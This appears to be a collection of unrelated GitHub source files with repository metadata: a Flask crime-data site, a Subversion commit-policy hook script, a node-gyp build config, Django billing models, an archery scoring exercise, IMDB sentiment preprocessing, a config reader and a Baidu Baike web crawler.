joshuakdejong@gmail.com
|
f6e865c5110f9052fdbb39331313e2ca555771da
|
9e1f6ccb24740e5dc51c71b76ffc3df4f561453e
|
/app.py
|
4451f01d8c4e516275d05abca23045fda760067c
|
[] |
no_license
|
AbbieKent/Analyzing-Atlanta-Crime
|
2ed7ed191b757482c1d3f42fb96da53a921b09ee
|
872ecb801b1abec1f41dd732ee9d6f88d70f6072
|
refs/heads/main
| 2023-03-17T17:44:25.125117
| 2021-03-15T21:11:42
| 2021-03-15T21:11:42
| 348,123,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,506
|
py
|
from flask import Flask, render_template
from flask import request, url_for, render_template, redirect
import pandas as pd
import numpy as np
import pdb, os
from os import environ
import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import LabelEncoder
from platform import python_version
print(python_version())
# Create an instance of our Flask app.
app = Flask(__name__)
# Set route
@app.route('/')
def index():
print('STARTING! '*20)
mapbox_access_token = "pk.eyJ1IjoiZGF2aWRjb3kiLCJhIjoiY2tqcHU1YzBzOHY4ZjJxcWpkNGI5b2h2MSJ9.CsPttIW0Q41kP2uOBN6n8g"
# pdb.set_trace()
print(os.getcwd())
# df = pd.read_csv('./static/data/data.csv')
df = pd.read_csv('./static/data/data.csv')
#df = df.head(5)
return render_template('index.html', tables = [df.to_html(classes='female')],
titles=['IDKLOL'],
mapbox_access_token=mapbox_access_token)
@app.route('/neighborhood')
def neighborhood():
return render_template('neighborhood.html')
@app.route('/typesofcrimes')
def crime():
return render_template('crime.html')
@app.route('/timeofyear')
def year():
return render_template('Timeofyear.html')
@app.route('/contactinfo')
def contact():
return render_template('contactinfo.html')
@app.route('/index')
def homepage():
return render_template('index.html')
if __name__ == "__main__":
app.run(debug=True)
|
[
"arkent10@gmail.com"
] |
arkent10@gmail.com
|
940dfcffd7da2f2431e4e7d093e93c7a44d5ca3b
|
9699ff2d4f407746c80c507f158da02f5ab9596a
|
/subversion/contrib/hook-scripts/enforcer/.svn/text-base/enforcer.svn-base
|
caacf749ddd37057e18c2fd432789b0043a5914f
|
[
"BSD-3-Clause",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"X11"
] |
permissive
|
AsherBond/MondocosmOS-Dependencies
|
7af67e41ae60b578800fc4184fa69a6b44da1715
|
bfd2554e6c2cfc4bc1ecb2b653594ca9f0448392
|
refs/heads/master
| 2021-01-23T13:53:07.122515
| 2011-10-03T13:22:43
| 2011-10-03T13:22:43
| 2,504,513
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,260
|
#!/usr/bin/python
# -*- coding:utf-8;mode:python;mode:font-lock -*-
##
# Utility for Subversion commit hook scripts
# This script enforces certain coding guidelines
##
# Copyright (c) 2005 Wilfredo Sanchez Vega <wsanchez@wsanchez.net>.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHORS DISCLAIM ALL
# WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER
# TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
##
import sys
import os
import getopt
import popen2
#
# FIXME: Should probably retool this using python bindings, not svnlook
#
__doc__ = '''
Enforcer is a utility which can be used in a Subversion pre-commit
hook script to enforce various requirements which a repository
administrator would like to impose on data coming into the repository.
A couple of example scenarios:
- In a Java project I work on, we use log4j extensively. Use of
System.out.println() bypasses the control that we get from log4j,
so we would like to discourage the addition of println calls in our
code.
We want to deny any commits that add a println into the code. The
world being full of exceptions, we do need a way to allow some uses
of println, so we will allow it if the line of code that calls
println ends in a comment that says it is ok:
System.out.println("No log4j here"); // (authorized)
We also do not (presently) want to refuse a commit to a file which
already has a println in it. There are too many already in the
code and a given developer may not have time to fix them up before
commiting an unrelated change to a file.
- The above project uses WebObjects, and you can enable debugging in
a WebObjects component by turning on the WODebug flag in the
component WOD file. That is great for debugging, but massively
bloats the log files when the application is deployed.
We want to disable any commit of a file enabling WODebug,
regardless of whether the committer made the change or not; these
have to be cleaned up before any successful commit.
What this script does is it uses svnlook to peek into the transaction
is progress. As it sifts through the transaction, it calls out to a
set of hooks which allow the repository administrator to examine what
is going on and decide whether it is acceptable. Hooks may be written
(in Python) into a configuration file. If the hook raises an
exception, enforcer will exit with an error status (and presumably the
commit will be denied by th pre-commit hook). The following hooks are
available:
verify_file_added(filename)
- called when a file is added.
verify_file_removed(filename)
- called when a file is removed.
verify_file_copied(destination_filename, source_filename)
- called when a file is copied.
verify_file_modified(filename)
- called when a file is modified.
verify_line_added(filename, line)
- called for each line that is added to a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_line_removed(filename, line)
- called for each line that is removed from a file.
(verify_file_modified() will have been called on the file
beforehand)
verify_property_line_added(filename, property, line)
- called for each line that is added to a property on a file.
verify_property_line_removed(filename, property, line)
- called for each line that is removed from a property on a file.
In addition, these functions are available to be called from within a
hook routine:
open_file(filename)
- Returns an open file-like object from which the data of the given
file (as available in the transaction being processed) can be
read.
In our example scenarios, we can deny the addition of println calls by
hooking into verify_line_added(): if the file is a Java file, and the
added line calls println, raise an exception.
Similarly, we can deny the commit of any WOD file enabling WODebug by
hooking into verify_file_modified(): open the file using open_file(),
then raise if WODebug is enabled anywhere in the file.
Note that verify_file_modified() is called once per modified file,
whereas verify_line_added() and verify_line_removed() may each be
called zero or many times for each modified file, depending on the
change. This makes verify_file_modified() appropriate for checking
the entire file and the other two appropriate for checking specific
changes to files.
These example scenarios are implemented in the provided example
configuration file "enforcer.conf".
When writing hooks, it is usually easier to test the hooks on committed
transactions already in the repository, rather than installing the
hook and making commits to test the them. Enforcer allows you to
specify either a transaction ID (for use in a hook script) or a
revision number (for testing). You can then, for example, find a
revision that you would like to have blocked (or not) and test your
hooks against that revision.
'''
__author__ = "Wilfredo Sanchez Vega <wsanchez@wsanchez.net>"
##
# Handle command line
##
program = os.path.split(sys.argv[0])[1]
debug = 0
transaction = None
revision = None
def usage(e=None):
if e:
print e
print ""
print "usage: %s [options] repository config" % program
print "options:"
print "\t-d, --debug Print debugging output; use twice for more"
print "\t-r, --revision rev Specify revision to check"
print "\t-t, --transaction txn Specify transaction to check"
print "Exactly one of --revision or --transaction is required"
sys.exit(1)
# Read options
try:
(optargs, args) = getopt.getopt(sys.argv[1:], "dt:r:", ["debug", "transaction=", "revision="])
except getopt.GetoptError, e:
usage(e)
for optarg in optargs:
(opt, arg) = optarg
if opt in ("-d", "--debug" ): debug += 1
elif opt in ("-t", "--transaction"): transaction = arg
elif opt in ("-r", "--revision" ): revision = arg
if transaction and revision:
usage("Cannot specify both transaction and revision to check")
if not transaction and not revision:
usage("Must specify transaction or revision to check")
if not len(args): usage("No repository")
repository = args.pop(0)
if not len(args): usage("No config")
configuration_filename = args.pop(0)
if len(args): usage("Too many arguments")
##
# Validation
# All rule enforcement goes in these routines
##
def open_file(filename):
"""
Retrieves the contents of the given file.
"""
cat_cmd = [ "svnlook", "cat", None, repository, filename ]
if transaction: cat_cmd[2] = "--transaction=" + transaction
elif revision: cat_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
cat_out, cat_in = popen2.popen2(cat_cmd)
cat_in.close()
return cat_out
def verify_file_added(filename):
"""
Here we verify file additions which may not meet our requirements.
"""
if debug: print "Added file %r" % filename
if configuration.has_key("verify_file_added"):
configuration["verify_file_added"](filename)
def verify_file_removed(filename):
"""
Here we verify file removals which may not meet our requirements.
"""
if debug: print "Removed file %r" % filename
if configuration.has_key("verify_file_removed"):
configuration["verify_file_removed"](filename)
def verify_file_copied(destination_filename, source_filename):
"""
Here we verify file copies which may not meet our requirements.
"""
if debug: print "Copied %r to %r" % (source_filename, destination_filename)
if configuration.has_key("verify_file_copied"):
configuration["verify_file_copied"](destination_filename, source_filename)
def verify_file_modified(filename):
"""
Here we verify files which may not meet our requirements.
Any failure, even if not due to the specific changes in the commit
will raise an error.
"""
if debug: print "Modified file %r" % filename
if configuration.has_key("verify_file_modified"):
configuration["verify_file_modified"](filename)
def verify_line_added(filename, line):
"""
Here we verify new lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_added"):
configuration["verify_line_added"](filename, line)
def verify_line_removed(filename, line):
"""
Here we verify removed lines of code which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if configuration.has_key("verify_line_removed"):
configuration["verify_line_removed"](filename, line)
def verify_property_line_added(filename, property, line):
"""
Here we verify added property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Add %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_added"):
configuration["verify_property_line_added"](filename, property, line)
def verify_property_line_removed(filename, property, line):
"""
Here we verify removed property lines which may not meet our requirements.
Code not changed as part of this commit is not verified.
"""
if debug: print "Del %s::%s: %s" % (filename, property, line)
if configuration.has_key("verify_property_line_removed"):
configuration["verify_property_line_removed"](filename, property, line)
##
# Do the Right Thing
##
configuration = {"open_file": open_file}
execfile(configuration_filename, configuration, configuration)
diff_cmd = [ "svnlook", "diff", None, repository ]
if transaction: diff_cmd[2] = "--transaction=" + transaction
elif revision: diff_cmd[2] = "--revision=" + revision
else: raise ValueError("No transaction or revision")
diff_out, diff_in = popen2.popen2(diff_cmd)
diff_in.close()
try:
state = 0
#
# This is the svnlook output parser
#
for line in diff_out:
if line[-1] == "\n": line = line[:-1] # Zap trailing newline
# Test cases:
# r2266: Added text files, property changes
# r18923: Added, deleted, modified text files
# r25692: Copied files
# r7758: Added binary files
if debug > 1: print "%4d: %s" % (state, line) # Useful for testing parser problems
if state is -1: # Used for testing new states: print whatever is left
print line
continue
if state in (0, 100, 300): # Initial state or in a state that may return to initial state
if state is 0 and not line: continue
colon = line.find(":")
if state is not 300 and colon != -1 and len(line) > colon + 2:
action = line[:colon]
filename = line[colon+2:]
if action in (
"Modified",
"Added", "Deleted", "Copied",
"Property changes on",
):
if action == "Modified": verify_file_modified(filename)
elif action == "Added" : verify_file_added (filename)
elif action == "Deleted" : verify_file_removed (filename)
elif action == "Copied":
i = filename.find(" (from rev ")
destination_filename = filename[:i]
filename = filename[i:]
i = filename.find(", ")
assert filename[-1] == ")"
source_filename = filename[i+2:-1]
verify_file_copied(destination_filename, source_filename)
filename = destination_filename
if action == "Modified" : state = 10
elif action == "Added" : state = 10
elif action == "Deleted" : state = 10
elif action == "Copied" : state = 20
elif action == "Property changes on": state = 30
else: raise AssertionError("Unknown action")
current_filename = filename
current_property = None
continue
assert state in (100, 300)
if state is 10: # Expecting a bar (follows "(Added|Modified|Deleted):" line)
assert line == "=" * 67
state = 11
continue
if state is 11: # Expecting left file info (follows bar)
if line == "": state = 0
elif line == "(Binary files differ)": state = 0
elif line.startswith("--- "): state = 12
else: raise AssertionError("Expected left file info, got: %r" % line)
continue
if state is 12: # Expecting right file info (follows left file info)
assert line.startswith("+++ " + current_filename)
state = 100
continue
if state is 20: # Expecting a bar or blank (follows "Copied:" line)
# Test cases:
# r25692: Copied and not modified (blank)
# r26613: Copied and modified (bar)
if not line:
state = 0
elif line == "=" * 67:
state = 11
else:
raise AssertionError("After Copied: line, neither bar nor blank: %r" % line)
continue
if state is 100: # Expecting diff data
for c, verify in (("-", verify_line_removed), ("+", verify_line_added)):
if len(line) >= 1 and line[0] == c:
try: verify(current_filename, line[1:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
break
else:
if (
not line or
(len(line) >= 4 and line[:2] == "@@" == line[-2:]) or
(len(line) >= 1 and line[0] == " ") or
line == "\\ No newline at end of file"
):
continue
raise AssertionError("Expected diff data, got: %r" % line)
continue
if state is 30: # Expecting a bar (follows "Property changes on:" line)
assert line == "_" * 67
state = 31
continue
if state is 31: # Expecting property name (follows bar)
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
break
else:
raise AssertionError("Unexpected property name line: %r" % line)
state = 300
# Fall through to state 300
if state is 300:
if not line:
state = 0
continue
for label in (
"Name", # svn versions < 1.5
"Added", "Modified", "Deleted" # svn versions >= 1.5
):
if line.startswith(label + ": "):
current_property = line[len(label)+2:]
current_verify_property_function = None
break
else:
for prefix, verify in (
(" - ", verify_property_line_removed),
(" + ", verify_property_line_added)
):
if line.startswith(prefix):
try: verify(current_filename, current_property, line[5:])
except Exception, e:
sys.stderr.write(str(e))
sys.stderr.write("\n")
sys.exit(1)
current_verify_property_function = verify
break
else:
if not line: continue
if current_verify_property_function is None:
raise AssertionError("Expected property diff data, got: %r" % line)
else:
# Multi-line property value
current_verify_property_function(current_filename, current_property, line)
continue
raise AssertionError("Unparsed line: %r" % line)
if debug: print "Commit is OK"
finally:
for line in diff_out: pass
diff_out.close()
|
[
"asherbond@asherbond.com"
] |
asherbond@asherbond.com
|
|
f37490ad07011a1845fa6775b2a3edffd1ff59fc
|
5141c8756e790847866c19d63744bd7c8033a51c
|
/docs/libs/reveal.js/3.7.0/plugin/multiplex/node_modules/bufferutil/build/config.gypi
|
508a69af90f898303ce883dba2be1aa581eebd58
|
[
"MIT"
] |
permissive
|
al341801/EI1036_42
|
db6fceb4fdb9272b28f34c16ee520ce072c5810b
|
d1d2c1b86a134fc4c45ba4146002589f7bee27f3
|
refs/heads/master
| 2020-09-15T13:02:09.056697
| 2019-11-22T15:05:53
| 2019-11-22T15:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,286
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 59,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "59.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/dllido/.node-gyp/9.3.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/dllido/.npm-init.js",
"userconfig": "/Users/dllido/.npmrc",
"cidr": "",
"node_version": "9.3.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/dllido/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.7.0 node/v9.3.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"node_options": "",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/pb/2r7f4bq147bgw8b7s_x_s3900000gn/T",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
|
[
"dllido@MacBook-Pro-de-Dolores.local"
] |
dllido@MacBook-Pro-de-Dolores.local
|
653e1569defce82bd7cefae6b2b508f8851295a1
|
af4b590504660a302f53a6fd99a5cb2e1244b85f
|
/src/billing/models.py
|
d6325f0ceba818542cbc794137a9674a6eddcd9c
|
[] |
no_license
|
qkhan/NewEcommerce
|
3216da9e80567f9c548efcac0dd00ee754399848
|
12f40adf071471bdc30d76e07bc563949c5f5d19
|
refs/heads/master
| 2020-03-09T22:59:24.568434
| 2018-04-11T06:52:10
| 2018-04-11T06:52:10
| 129,048,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from django.conf import settings
from django.db import models
from accounts.models import GuestEmail
from django.db.models.signals import pre_save, post_save
User = settings.AUTH_USER_MODEL
class BillingProfileManager(models.Manager):
def new_or_get(self, request):
user = request.user
guest_email_id = request.session.get('guest_email_id')
print("Guest email id: ", guest_email_id)
created = False
obj = None
if user.is_authenticated():
'logged in user checkout; remember payment stuff'
obj, created = self.model.objects.get_or_create(user=user, email=user.email)
#print("Billing Profile:", billing_profile, " | ", billing_profile_created)
elif guest_email_id is not None:
'guest user checkout; auto reloads payment stuff'
guest_email_obj = GuestEmail.objects.get(id=guest_email_id)
obj, created = self.model.objects.get_or_create(email=guest_email_obj.email)
else:
pass
return obj, created
# Create your models here.
class BillingProfile(models.Model):
user = models.OneToOneField(User, null=True, blank=True)
email = models.EmailField()
active = models.BooleanField(default=True)
update = models.DateTimeField(auto_now=True)
timestamp = models.DateTimeField(auto_now_add=True)
objects = BillingProfileManager()
def __str__(self):
return self.email
def user_created_receiver(sender, instance, created, *args, **kwargs):
if created and instance.email:
BillingProfile.objects.get_or_create(user=instance, email=instance.email)
post_save.connect(user_created_receiver, sender=User)
|
[
"qaisarkhan@Qaisars-iMac.local"
] |
qaisarkhan@Qaisars-iMac.local
|
e7402159b694a4820f2b00e2af214a79f9043612
|
e965225b5b16feb3a8264980cdeff83342e1167c
|
/pythontask.py
|
a4b01f83681283f4550677aedce2dd6b39d9b2de
|
[] |
no_license
|
challapavankumar/Archeville-Super-Archy-Tournament-task
|
7b8631fe448f04f9ed335327e1a2457c3bc8e5cf
|
d646a830865f5607193ca883a217974fb4e5a641
|
refs/heads/main
| 2023-01-31T15:03:21.658700
| 2020-12-18T06:11:14
| 2020-12-18T06:11:14
| 322,502,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,858
|
py
|
rounds = int(input("No of rounds to play "))
scores={"A":50,"B":4,"C":3,"D":2,"E":1,"F":0}
bonuscheck=[]
bonusplayer=[]
teams={"Gyrhuna":[{"Jaons Diak":0},{"Susu":0}],
"Achni":[{"Milog":0},{"Tianlong":0}],
"Bathar":[{"Pakhangba":0},{"Poubi Lai Paphal":0}]}
teamno=len(teams)
bonusteam={}
teamscore={}
def WhoWonTheMatch(teamscore):
return [key for (key, value) in teamscore.items() if value == max(teamscore.values())]
for team in teams:
bonusteam[team]=0
teamscore[team]=0
players=0
for i in teams:
players+=len(teams[i])
playerscores={}
for r in range(rounds):
for team in teams:
bonuscheck=[]
bonusplayer=[]
teamscore[team]=0
for pl in teams[team]:
key, value = list(pl.items())[0]
temp=0
playerscore=(input("Enter the score of " +str(key)+str(" from team ")+team+" "))
if playerscore not in (["A","B","C","D","E","F"]):
print("Please select the score from A-F")
exit(0)
bonuscheck.append(playerscore)
bonusplayer.append(key)
prefix=key
if prefix not in playerscores:
playerscores[prefix]=scores[playerscore]
else:
playerscores[prefix]+=scores[playerscore]
temp=playerscores[prefix]
teamscore[team]+=playerscores[prefix]
if(len(set(bonuscheck))==1):
bonusteam[team]+=2
teamscore[team]+=bonusteam[team]
scores={key:value+1 if(key!="F") else value for key,value in(scores.items()) }
print(playerscores)
print(bonusteam)
print(teamscore)
print("Next Round")
key=WhoWonTheMatch(teamscore)[0]
print("Game over. {} won!!!".format(key))
|
[
"noreply@github.com"
] |
challapavankumar.noreply@github.com
|
75d75f75c5dfebdcd52ba31013c836708232536a
|
6e68d7f4bbd2cf2ecad7cdf6bbd07d6687f2685c
|
/preprocessing.py
|
a406884f0db4f90c620feac07d8ce7282e1b221b
|
[] |
no_license
|
AbhinavJindl/sentiment_analysis
|
bd5a08345913d92cd5be0e61fe5095e196fb9d49
|
b2154a89f3c0bfa89318e8d280734ed25af1cc5f
|
refs/heads/master
| 2020-03-27T20:41:28.945916
| 2018-09-02T13:55:07
| 2018-09-02T13:55:07
| 147,086,857
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,108
|
py
|
import random
import pickle
no_words = 5000
no_reviews = 1000
no_validation=1000
no_test=1000
forest_trees=50
forest_tree_features=2000
def add_noice(review_list_pos,review_list_neg,p):
n=int((p/100)*len(review_list)/2)
random.sample(review_list,n)
def load(filename):
file = open(filename,'rb')
obj=pickle.load(file)
file.close()
return obj
def save(obj,filename):
file=open(filename,'wb')
pickle.dump(obj,file)
file.close()
#returns a dictionary for a review given string
def list_review(s,indexlist):
dic = {}
tokens=s.split(" ")
dic['sentiment']=int(tokens[0])
dic['list']=[]
for i in range(1,len(tokens)):
t=tokens[i].split(":")
if int(t[0]) in indexlist:
dic['list'].append(int(t[0]))
return dic
def preprocess():
wordsfile = open('aclImdb_v1/aclImdb/imdb.vocab','r',encoding='utf-8')
valuefile = open('aclImdb_v1/aclImdb/imdbEr.txt','r',encoding='utf-8')
count=0
words_i=[]
for line in valuefile:
linetoken=line.split('\n')
current=(count, float(linetoken[0]))
words_i.append(current)
count=count+1
words_i= sorted(words_i,key=lambda x: x[1])
indexlist=[]
for i in range(int(no_words/2)):
indexlist.append(words_i[i][0])
indexlist.append(words_i[-i][0])
indexlist= sorted(indexlist)
forest_index_lists=[]
for i in range(forest_trees):
forest_index_lists.append(random.sample(indexlist,forest_tree_features))
reviewsfile = open('aclImdb_v1/aclImdb/train/labeledBow.feat','r',encoding='utf-8')
full_review_list = reviewsfile.readlines();
random_list_pos = random.sample(range(0,int(len(full_review_list)/2)),int(no_reviews/2))
random_list_neg = random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_reviews/2))
review_list={}
for i in random_list_pos:
review_list[i]=list_review(full_review_list[i],indexlist)
for i in random_list_neg:
review_list[i]=list_review(full_review_list[i],indexlist)
testfile = open('aclImdb_v1/aclImdb/test/labeledBow.feat','r',encoding='utf-8')
test_review_list=testfile.readlines()
validation_list_pos=random.sample(range(0,int(len(full_review_list)/2)),int(no_validation/2))
validation_list_neg= random.sample(range(int(len(full_review_list)/2),len(full_review_list)),int(no_validation/2))
validation_list = validation_list_pos+validation_list_neg
validation_reviews={}
for i in validation_list:
validation_reviews[i]=list_review(full_review_list[i],indexlist)
test_list_pos=random.sample(range(0,int(len(test_review_list)/2)),int(no_test/2))
test_list_neg= random.sample(range(int(len(test_review_list)/2),len(test_review_list)),int(no_test/2))
test_list=test_list_neg+test_list_pos
test_reviews={}
for i in test_list:
test_reviews[i]=list_review(test_review_list[i],indexlist)
save(validation_reviews,'validationreviews.pkl')
save(validation_list,'validationlist.pkl')
save(test_reviews,'testreviews.pkl')
save(test_list,'testlist.pkl')
save(random_list_pos,'randompos.pkl')
save(random_list_neg,'randomneg.pkl')
save(review_list,'reviewlist.pkl')
save(indexlist,'indexlist.pkl')
if __name__=="__main__":
preprocess()
|
[
"2016csb1026@iitrpr.ac.in"
] |
2016csb1026@iitrpr.ac.in
|
2fb3b208f8422d53eb69c09474b9e669b7f9db6b
|
b30def8f44060e373dba0de9facb62964224d285
|
/config.py
|
97dc08977f3cd997b513264801ccb5c7cf5c2f98
|
[] |
no_license
|
saakash309/Data-Processing-
|
1136e2612b7068d9fef695587070e2b98ebb7ff8
|
7857de4654c611689b422d8d6c88e61ba498a4c0
|
refs/heads/main
| 2023-09-04T20:30:49.225368
| 2021-11-23T06:04:45
| 2021-11-23T06:04:45
| 430,939,150
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,185
|
py
|
from configparser import ConfigParser
from pprint import pprint
#reading the config file
class Data():
'''
Return a set of coulmns from a config file that will be displayed
Path = path of the configuration file
'''
def __init__(self,path) -> None:
self.path = path
def fields(self):
config = ConfigParser()
config.read(self.path)
#finding the fields that needs to be displayed
keys = []
if 'Idnumber' not in (config['Fields'])or config['Fields']['Idnumber']=='no':
keys.append('IDNUMBER')
#print(config.options('Fields'))
for key,value in config.items(config.sections()[0]):
if value == 'yes':
keys.append(str(key).upper().strip())
return keys
def fpath(self):
config = ConfigParser()
config.read(self.path)
for key,value in config.items(config.sections()[-1]):
#print(key,value)
if key == 'PathtoDataFile'.lower():
#print(value)
return value
else:
return None
#print(Data('config.ini').fpath())
|
[
"noreply@github.com"
] |
saakash309.noreply@github.com
|
bcfca9b47c82bc52528894a9459bda4232f48196
|
f582461cc398909906a1ca65fa250105319289d8
|
/spider_main.py
|
986f58a635f53e9861335c7fe8c902f544f9017e
|
[] |
no_license
|
ITT13021/baike_spider
|
d0dd637074c99cd7a1b9d703b4406939ed745fbd
|
2a2eea68dd94bf15ec1769986554514c53a28854
|
refs/heads/master
| 2021-07-04T12:33:37.377379
| 2017-09-27T01:49:00
| 2017-09-27T01:49:00
| 104,868,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,568
|
py
|
# coding=utf-8
from baike_spider import html_downloader
from baike_spider import html_outputer
from baike_spider import html_parser
from baike_spider import url_manager
class SpriderMain(object):
def __init__(self):
self.urls = url_manager.UrlManager()
self.downloader = html_downloader.HtmlDownloader()
self.parser = html_parser.HtmlParser()
self.outputer = html_outputer.HtmlOutputer()
def craw(self, root_url, count):
i = 1
self.urls.add_new_url(root_url)
while self.urls.has_new_url():
if count != 0:
try:
new_url = self.urls.get_new_url()
print 'we are collecting in %d : %s' % (i, new_url)
html_cont = self.downloader.download(new_url)
new_urls, new_data = self.parser.parse(new_url, html_cont)
self.urls.add_new_urls(new_urls)
self.outputer.collect_data(new_data)
except:
print "collected failed in %d" % i
i += 1
count -= 1
else:
break
self.outputer.output_html()
if __name__ == "__main__":
obj_spider = SpriderMain()
root_url = raw_input("请输入您要爬取首个百度百科词条的页面,我们会搜索与其相关的词条,例如:https://baike.baidu.com/item/Python:" + "\n")
count = input("请输入您要爬取词条的个数(爬取越多消耗时间越长哦!): ")
obj_spider.craw(root_url, count)
|
[
"473457683@qq.com"
] |
473457683@qq.com
|
dca0df86cf196077787b8351e77a52367efaf8ea
|
a0af94e54aaeaf0dfc373196c3bc7372926a7c7f
|
/colorize
|
aca3ecc24004252a087c462d6b1a71056603bbf5
|
[
"MIT"
] |
permissive
|
cheshirex/colorize
|
7170f3ff250009bc4ca40e7740498328b3bf1ab0
|
c95049c312a422023e48b8e1522c57b4c2913446
|
refs/heads/main
| 2023-01-07T05:58:04.019437
| 2020-11-04T10:27:57
| 2020-11-04T10:27:57
| 309,968,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,445
|
#!/usr/bin/env python
